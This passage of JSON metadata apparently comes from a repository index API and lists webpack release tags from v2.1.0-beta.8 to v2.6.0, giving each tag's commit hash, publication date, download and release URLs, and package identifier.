_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/ap